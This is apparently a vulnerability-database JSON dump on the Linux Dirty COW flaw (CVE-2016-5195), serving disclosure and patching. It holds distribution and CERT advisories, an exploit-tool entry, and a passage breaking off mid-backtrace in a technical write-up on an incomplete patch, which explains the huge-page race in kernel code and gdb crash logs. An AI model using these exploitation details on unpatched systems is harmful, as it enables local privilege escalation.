row, first place by share of users attacked by mobile ransomware went to the US (2.03%). Same as last year, the Svpeng ransomware family was the most commonly encountered in the country. It was also the most widespread in Iran (0.37%).\n\nThe situation in Kazakhstan (0.56%) was unchanged: the country still ranks second, and the most prevalent threat there remains the Rkor family. \n\n## Conclusion\n\nThe year 2019 saw the appearance of several highly sophisticated mobile banking threats, in particular, malware that can interfere with the normal operation of banking apps. The danger they pose cannot be overstated, because they cause direct losses to the victim. It is highly likely that this trend will continue into 2020, and we will see more such high-tech banking Trojans.\n\nAlso in 2019, attacks involving the use of mobile stalkerware became more frequent, the purpose being to monitor and collect information about the victim. In terms of sophistication, stalkerware is keeping pace with its malware cousins. It is quite likely that 2020 will see an increase in the number of such threats, with a corresponding rise in the number of attacked users.\n\nJudging by our statistics, adware is gaining ever more popularity among cybercriminals. In all likelihood, going forward we will encounter new members of this class of threats, with the worst-case scenario involving adware modules pre-installed on victims' devices.\n\n[](<https://www.brighttalk.com/webcast/15591/388802?utm_source=securelist&utm_medium=blog&utm_campaign=gl_webinar-yara-2020_sl0099&utm_content=link&utm_term=gl_securelist__sl0099_link_blog_webinar-yara-2020>)", "modified": "2020-02-25T10:00:43", "published": "2020-02-25T10:00:43", "id": "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE", "href": "https://securelist.com/mobile-malware-evolution-2019/96280/", "type": "securelist", "title": "Mobile malware evolution 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-22T17:20:39", "published": "2016-10-22T17:20:39", "id": "FEDORA:800BC60776C5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.9-200.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-18T01:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-1", "href": "https://ubuntu.com/security/notices/USN-3106-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "edition": 6, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-1", "href": "https://ubuntu.com/security/notices/USN-3104-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "### Overview \n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem, which may be leveraged locally to gain root privileges.\n\n### Description \n\n[**CWE-362**](<https://cwe.mitre.org/data/definitions/362.html>)**: Concurrent Execution using Shared Resource with Improper Synchonization ('Race Condition') -** CVE-2016-5195\n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem. A local attacker may leverage this vulnerability in affected systems to gain root privileges. For more information, including proofs of concept, refer to the [Dirty COW disclosure page](<https://dirtycow.ninja/>). \n \nNote that this vulnerability is reported as being actively exploited in the wild. \n \n--- \n \n### Impact \n\nA local, unprivileged attacker can escalate privileges to root. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nLinux kernel versions [4.8.3](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>), [4.7.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>), and [4.4.26](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>) address this vulnerability. [Red Hat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) have released patches. Users should apply patches through their Linux distributions' normal update process. \n \n--- \n \n### Vendor Information\n\n243144\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### CentOS Affected\n\nNotified: October 21, 2016 Updated: October 27, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.centos.org/forums/viewtopic.php?f=51&amp;t=59782&amp;hilit=CVE%202016%205195&amp;start=10](<https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10>)\n\n### CoreOS Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://coreos.com/blog/CVE-2016-5195.html>\n\n### Debian GNU/Linux Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.debian.org/security/2016/dsa-3696>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n\n### Red Hat, Inc. Affected\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n\n### SUSE Linux __ Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSUSE and the openSUSE project are affected by this issue and we have released updates. \n \n<https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Ubuntu Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n\n### Arista Networks, Inc. __ Not Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n**Statement Date: October 24, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nArista Network's software products EOS and Cloud Vision Portal (CVP) are not exploitable by CVE-2016-5195 (Kernel Local Privilege Escalation). \n \nFor further information: \n<https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Peplink __ Not Affected\n\nUpdated: November 17, 2016 \n\n**Statement Date: November 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWanting to state that Peplink Pepwave products are not affected by Dirty COW \n \nOur own announcement: \n<https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Arch Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 16 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.6 | E:F/RL:OF/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirtycow.ninja/>\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>\n * <https://cwe.mitre.org/data/definitions/362.html>\n\n### Acknowledgements\n\nRed Hat credits Phil Oester with reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5195](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-5195>) \n---|--- \n**Date Public:** | 2016-10-20 \n**Date First Published:** | 2016-10-21 \n**Date Last Updated: ** | 2016-11-17 13:17 UTC \n**Document Revision: ** | 15 \n", "modified": "2016-11-17T13:17:00", "published": "2016-10-21T00:00:00", "id": "VU:243144", "href": "https://www.kb.cert.org/vuls/id/243144", "type": "cert", "title": "Linux kernel memory subsystem copy on write mechanism contains a race condition vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "id": "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "title": "Linux Dirty COW Local File Overwrite", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:40:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability in the memory manager functions of the Linux Kernel could allow unauthenticated, local attackers to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nThe vulnerability is due to a race condition in the memory manager functions of the Linux Kernel. An attacker could exploit this vulnerability by racing the madvise (MADV_DONTNEED) system call. An exploit could allow the attacker to gain write access to otherwise read-only memory mappings. A local user could modify on-disk binaries, bypassing the standard permission mechanisms.\n\nOn October 19, 2016, a new vulnerability related to a race condition in the memory manager of the Linux Kernel was disclosed. This vulnerability could allow unprivileged, local users to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nCisco has released software updates that address this vulnerability. For information about affected and fixed software releases, consult the Cisco bug IDs in the Vulnerable Products table.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux\"]", "modified": "2018-08-16T13:48:18", "published": "2016-10-26T15:00:00", "id": "CISCO-SA-20161026-LINUX", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "type": "cisco", "title": "Vulnerability in Linux Kernel Affecting Cisco Products: October 2016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, 